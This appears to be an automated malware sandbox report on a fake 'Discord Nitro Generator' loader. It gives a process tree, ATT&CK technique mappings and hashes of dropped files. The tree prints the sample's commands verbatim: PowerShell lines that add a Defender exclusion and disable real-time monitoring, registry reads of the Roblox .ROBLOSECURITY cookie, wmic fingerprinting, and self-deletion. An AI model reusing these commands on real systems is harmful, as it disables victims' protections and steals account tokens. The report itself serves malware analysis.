  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  PID:456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
  2⤵
  PID:3356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2064 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
  2⤵
  PID:972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2144,8996438756183863526,17224465501216771910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4128

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1000

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\" -spe -an -ai#7zMap13878:118:7zEvent8496
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2196

C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe
"C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4496
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe"
  2⤵
  - Views/modifies file attributes
  PID:3156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3580
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3392
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:312
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4584
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4136
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3512
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4704

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\requirements.txt
1⤵
PID:4796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bf0b2725c0cd068b0f67eb62cbc3244f

SHA1
54ee5cd3bd0ae55707020bf40c4342736e310caf

SHA256
5dff0f70a7691805910a88ef91c9ecc338c6a27b818ff6b0c8bc6e0e8e381d36

SHA512
f622f17ddcf1a364bbe926fe427b1544c3bea200b65f24aee14a5eaa7b260e33f396ef07f2a0a53540dc4c0f5beebf431b6d7d0a9032890de13b99a2089b852e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e8cb3a8ae72d4143c46a67827ca0b7df

SHA1
171c2c090300f33f67510e38358077155a664f99

SHA256
7bf198a75746d630643056ad1571f0d46f6d069f7813a39888f7519b4b843e9e

SHA512
917d6ac30c1975f5266aa380baf9842575ad565c4399ef7da499e8f78d7300f6b1c4d3c5846d46b5c39fbbcd76097fe356274ce44eb35e8ca5c09522def6758e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
ab1a42456fc8f2257cc0ceedac811509

SHA1
0cce47f3492d253258d8521e57345da5dae47ef4

SHA256
3f5aea937a7c1ff89bc0fa60620895183706de31612c544f67ab55d1ea63280b

SHA512
fe407514c693a23046359ede3bca8e726f1711f5d52c4acc92f98ef6645045a7d27f8eda2d1d260b8c68307037df8c9461f66c881afb1a9366ae5a7ff417036a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
38f8b6fb9693b7d016faacba8be81aa2

SHA1
a02d90394a1d01476ac7eddd61d982b011876495

SHA256
85f1edfd7cb144ddbbc24bc719c978049b262cbb6bba116f86f2db6b10a295fa

SHA512
875089000d3ffadf2d210a358bc234c1a64ca51752e6963b671b0370759832db67cef1f3be0b0c2c2e72d0abe8fe04eb5921a0fd7785d1744b61de8f68baae98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
28KB

MD5
25b919f55805ea64425077d4b4bc2bc0

SHA1
74df051dcb6bc25cd17ac1840561fe6c7311c5eb

SHA256
530007a7b72106151818aff2a07a0fd67af3e6e7036b0c0e99f6a074e614145c

SHA512
5df3cae3cb3d610971356a921d4f101488181b398b52c7437e4aee24741476b21468799f291e995d8526ea99c07ee2005ad6fcc29016e59de0b60ed49e9365ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
11KB

MD5
974ee84a1a45a708303183b3bd3e0ae2

SHA1
931f50033b6fcdb5bd198f8e0ee1c7db8cc1ef2d

SHA256
9b4fd70ece50700a9d9c462238dd334fe257ffdcc98cf8f450f4647d4a3ab94a

SHA512
a9136b7fae4a9ffe69f1a5e7ed4155e238961eed7f7fcd3d98829f3db885472d2773af64864f1ab6c22becccc2073a8751ea17b2783933711e86783dd921499b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
c316cdab21b1d6339c8b21a1f3417f8d

SHA1
c4c5c3d47950a5e392dba348aff83c7dd70c203e

SHA256
22d6acfa9398a41b0d2e881561839c95a82c2572bd7123df38b98f0462cac2c3

SHA512
b41734385c642236a9e1c48c6a14e902408d55c8e377abcb9b2cab665e4825b240aaf69c7dc3f6a5f6d6aeeaf1136084934b9d3059786a92a215fa7df04bb8e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
350f9b62a2b84e9da57663eef36e7b26

SHA1
8d353610bb3e035ec794aac76bc10e0269e8f4e9

SHA256
c68db466b17fc3c795c0ca8c9eb753291bcede86c544ae31ca19279fd005233c

SHA512
207ad48a8d2c4db281d91112bad9d2c8cfb95ee594b3fe28fccd79984e8af0c65b02968ee66a9884b0f6a70c2b3cb66c0a2fec9bc5056397eecec2d670dd9a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
74ccc693e490c5ca8ac878a080cedf6f

SHA1
71d3ca7ac56cae6938bcf70d92cbe39ed2fd2caf

SHA256
3fb705888ae9a198b549d365cf39ed8c770ca81cff4a0fce70620c8208292d11

SHA512
0dc1f3a315726f434432448254759b273b19ae6afc0749d44e19fdb86e0306c22a16becd4884378ab7d43ef9c9f4a645d2922a436a7a857d2d492611daad06e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4a3978a16bd41cd2db758319e52fcd27

SHA1
7b64238a486b3ad504146f20669257294685b19c

SHA256
b0203c3229890f99bfc895cdd129285659ae71cf9250b098db8fa9accb969fa2

SHA512
44706f65e25c18b05108810a6bbcd5630a647293156698c51370fb66860bde771926c0bee8125e93ba7eab9adca22201f1bf110edc7323315ff048f337b14f62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
63887b1d2b6b9419907f7a3a1bf681af

SHA1
78e0e6a4bc6a9009b60568e4b2d8b327739d8d9f

SHA256
c030cfb89419d7d42e2cb27b39fb66b812da030ff3ec92a92edd8e97c8292c00

SHA512
f546561c2fba66da9233ab7474e4899e0e1f4c1ef1a1c8c91ab74a1373ae2a7710993d960dcc194673b248d61f57c61c20a7bc4306d2af6c0462aa8fbbb82cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b755737a27d2f94f5a7a4233cfcbc9de

SHA1
b773e721343180fed304bcd811853d062e83d219

SHA256
78ea6c70f9fdfebc26340791101353a559e117399ccd29a0563ce0b18f89fca0

SHA512
34e3d44daec02ca75d52c775e9d273a2df59afc77411e69e5a2b837dc7897250fa6024b23e5ef46b3f8e20cdddfaf90f07a53d2538773a74235ba2ea2e5fe3fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3c68f996e3c53b5b4c62daad8641326d

SHA1
6116a107a23b275e86eb7170d6bc6de1c7629e68

SHA256
bab834e0121b6d02319443dcb2d1f7b5bbd8bae0259c6289e043c1529ae5d46c

SHA512
27d500e553712b8074557d896c82cd3204cfbb6a782472d5e2b376e8e003a8d62bf8c2bdc5293507441c99651b982d75f7ae740124bfa104b760e4eb663c3451

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b0d389960abd6b8b43b17f50de065d7b

SHA1
b9d5809babca2bb5f5e34261671c3d0c59408dcc

SHA256
11f6758c781c4d7e43b222f9a4b72c01fd12117eaff8dfa270570d4d859b1b5d

SHA512
58fbeb4e4f66e51b5d06670cd80a01820f6fbd4ac991628715c579a6752f436a331a9355ef9b6d7c52a605ee494092c97f84fb7918aec463fec9b9e2b3ba6fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d13a.TMP

Filesize
1KB

MD5
8c6fdd05d91332a11797aa887117aa84

SHA1
6c852cec486facde2491afee93bbc28d478371e5

SHA256
c10b9290757e2a6487dd6911328c97a97a759b550229aa6e315de2b5ab8f95bf

SHA512
39f0a63cc197e3059074823ea9a6f905c86dab608c5932446d349bd700e04f6c3d017428ddb8c30da39df503f28a18c1a4374124d9581b57f18f69a41d6f00a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c67161f4ffe5dbe0c78acb3f7753aa35

SHA1
a1836a5f4cbf47bed6a7f4904059e851012eb248

SHA256
ff24089e76dab87693e923da0e2924b294fa8894d9cb157ce7ef36d6088d8d3c

SHA512
bb3d3b0539de903271166bc795258c9ab6fdc8c8bbe31669c521b3fb513dec14dfb47b6d0e7f159d5b6e90811528b7aa5c033b2e58c0e26f8696ef5e73c755e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
927f05858a41de8cfce6b6ca508d8835

SHA1
32ec72ea327e66909fb828aee6ef7e8a5bb8821e

SHA256
4dd211fa7d96112eb680fed021a78c5599d532999eb1301963f2ec2aafafe724

SHA512
6a5b3d19e599a97212a45df089927224a83dafa20c6d8b1b4316efa7ed7612cb52c064327c40236cbb91394ed8a0b9239086c3fafe4fcf2496078a9e826acbba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
380695c2d0ca1c2570bc7d80bc759a8c

SHA1
338be609636e077dbb3a157a9402029aed7479c1

SHA256
6996a8a73611a762ac6b1e16fd08ed247f3a5ec49ba1b425c7f02caed194d6da

SHA512
4190e5bf74b8ace2f2f47c421ab2e442f1ba37fe6551c5673bfc9ff82f594636897c707602b051967e83b807ca60be67e9fa31dcc036fcd5075101b00bbff7ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
866f217a797ac6868f75bc8c5fa439da

SHA1
74dc35a08466f8da41290f2ee89a96b38d9b5534

SHA256
e2597021db48b9bfe0869fe8468b5f66db9a80d0927576634842a1e650fa0ed4

SHA512
9df95c746df383768f7917eac95234402ee6e96083cd91cbd295903275b53ec26e66404f49e5086520bc10efd8c5a6966f4aa32247f1c1d035de9b8344fb9536

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5a218a3595284600fbe8a313cb3d9be5

SHA1
d16021f9c2c5c4c2582ef2d4c70cdbaf97a1abce

SHA256
71229cd0e799384f6abeb00a9b01141a70706873dec20df84436bf5aef9a55aa

SHA512
f5060a0ee276734bbc938d17b8ba4edb7888c4a88d0866916cf54ea42cb11006853b85eafb8de9d9fd92dd931d77ba07b258c81257ee84f87b9da052a5476c60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c65738617888921a153bd9b1ef516ee7

SHA1
5245e71ea3c181d76320c857b639272ac9e079b1

SHA256
4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

SHA512
2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb5c30d213a938d76ea627a4d05a0111

SHA1
9618958b449d646cb833edefb01dd372f8f0f4b0

SHA256
387991a291e69339f9a6099b4e9c55e55e5c6409e2c8ec50aa7ddbe3025a39dc

SHA512
54ff985ae7f14cc1a3c02d502be4c57ffbc231394e6358c37a0b00513d660ac52198bd946b1972491df54870e8414f905f7d398f0787ee1fe6652e194c801f07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aeiggstz.jt5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
